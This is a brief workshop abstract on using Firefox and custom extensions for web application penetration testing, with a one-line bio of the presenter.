There are a few commercial vulnerability scanners and penetration testing tools for the Web Application security space. There are even fewer open-source vulnerability scanners and penetration tools that serve this purpose. Firefox with its collection of security extensions and its relative ease of extension development is fast becoming a Web Application Penetration Testing platform of choice.
This workshop will focus on using Firefox as a Web Application Penetration Testing platform, developing Firefox extensions to automate common penetration testing tasks, and writing extensions to address issues that commercial tools don't.
Joe McCray's Bio:
Founder of LearnSecurityOnline.com. Rapid7 Assessment Practice manager